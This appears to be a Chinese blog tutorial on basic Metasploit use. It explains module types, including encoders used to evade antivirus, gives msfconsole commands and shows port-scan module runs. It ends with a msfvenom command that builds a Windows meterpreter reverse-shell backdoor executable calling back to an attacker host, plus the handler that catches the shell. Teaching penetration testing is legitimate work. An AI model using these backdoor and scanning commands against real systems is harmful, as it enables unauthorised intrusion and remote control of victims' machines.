MSF的基本使用

模块名词

辅助模块 - auxiliary (多半扫描收集信息)
Metasploit 为渗透测试的信息搜集环节提供了大量的辅助模块支持,包括针对各种网络服务的扫描与查
点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz 测试发掘
漏洞、实施网络协议欺骗等模块。
辅助模块能够帮助渗透测试者在渗透攻击之前取得目标系统丰富的情报信息。


渗透攻击模块 - exploits
渗透攻击模块是利用发现的安全漏洞或配置弱点对目标系统进行攻击,以植入和运行攻击载荷,从而获
取对远程目标系统访问权的代码组件。
主动渗透攻击所利用的安全漏洞位于网络服务端软件与服务承载的上层应用程序之中,由于这些服务通
常是在主机上开启一些监听端口并等待客户端连接,因此针对它们的渗透攻击可以主动发起,通过连接
目标系统网络服务,注入一些特殊构造的包含"邪恶"攻击数据的网络请求内容,触发安全漏洞,并使得
远程服务进程执行在"邪恶"数据中包含攻击载荷,从而获取目标系统的控制会话。
被动渗透攻击利用的漏洞位于客户端软件中,如浏览器、浏览器插件、电子邮件客户端、Office 与
Adobe 等各种文档阅读与编辑软件。对于这类存在于客户端软件的安全漏洞,我们无法主动地将数据从
远程输入到客户端软件中,因此只能采用被动渗透攻击的方式,即构造出"邪恶"的网页、电子邮件或文
档文件,并通过架设包含此类恶意内容的服务、发送邮件附件、结合社会工程学分发并诱骗目标用户打
开、结合网络欺骗和劫持技术等方式,等目标系统上的用户访问到这些邪恶的内容,从而触发客户端软
件中的安全漏洞,给出控制目标系统的Shell 会话。

攻击载荷模块 - payloads
攻击载荷是在渗透攻击成功后使目标系统运行的一段植入代码,通常作用是为渗透攻击者打开在目标系
统上的控制会话连接。

空指令模块 - nops
空指令(NOP) 是一些对程序运行状态不会造成任何实质影响的空操作或者无关操作指令,最典型的空指
令就是空操作,在x86 CPU 体系架构平台上的操作码是0x90 。

编码器模块 - encoders
攻击载荷模块与空指令模块组装完成一个指令序列后,在这段指令被渗透攻击模块加入邪恶数据缓冲区
交由目标系统运行之前,Metasploit 框架还需要完成一道非常重要的工序 - 编码。
编码器模块的第一个使命就是确保攻击载荷中不会出现渗透攻击过程中应加以避免的"坏字符"。
编码器的第二个使命就是对攻击载荷进行"免杀"处理。

后渗透攻击模块 - post
后渗透攻击模块主要支持在渗透攻击取得目标系统控制权之后,在受控系统中进行各式各样的后渗透攻
击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。

免杀模块 - evasion
对攻击载荷进行"免杀"处理。
exploits 渗透攻击模块
auxiliary 辅助模块
post 后渗透攻击模块
payloads 攻击载荷模块

1.msf的基本命令

use 使用某一个模块
back 退出模块
search 搜索关键字 选项-h获取帮助
use之后用
info 查看模块的详细信息
show options 查看脚本配置选项
show targets 显示所在模块适用的主机或者软件类型
set 模块选项设置
run|exploit 启动脚本
建立好会话之后
sessions -i 查看所有的会话 比如ssh扫描模块应用后爆破出密码会自动建立回话即可查询
sessions -i id 通过ID 号码,进入某一个会话
background 将会话隐藏在后台重新返回msf
search type:auxiliary path:arp 类型是补助模块 类型是补助模块 路径中包含arp
search type:auxiliary path:files

2.情报收集

主机发现

Metasploit 中提供了一些辅助模块可用于主机发现,这些模块位于
modules/auxiliary/scanner/discovery/ 目录中

use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/discovery/empty_udp
use auxiliary/scanner/discovery/ipv6_multicast_ping
use auxiliary/scanner/discovery/ipv6_neighbor
use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep

例arp_sweep

端口扫描

auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/tcp
auxiliary/scanner/portscan/ftpbounce
auxiliary/scanner/portscan/xmas
auxiliary/scanner/portscan/syn

例syn

msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) >
msf5 auxiliary(scanner/portscan/syn) > show options
msf5 auxiliary(scanner/portscan/syn) > info
msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.16.116
RHOSTS => 192.168.16.116
msf5 auxiliary(scanner/portscan/syn) > set PORTS 1-65535
PORTS => 1-65535
msf5 auxiliary(scanner/portscan/syn) > set THREADS 500
THREADS => 500
msf5 auxiliary(scanner/portscan/syn) > run

反弹shell到msf

生成exp后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx(kaliip)
lport=4444 -f exe -o reverse_tcp.exe

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.226.186
LHOST => 192.168.226.186
msf5 exploit(multi/handler) > set LPORT 4444

PORT => 4444
msf5 exploit(multi/handler) > run

此时目标机一但运行exe后门则msf段就可以得到一个 meterpreter 的shell

sql盲注脚本

上一篇

bulldog

下一篇
评论
发表评论 说点什么
还没有评论
186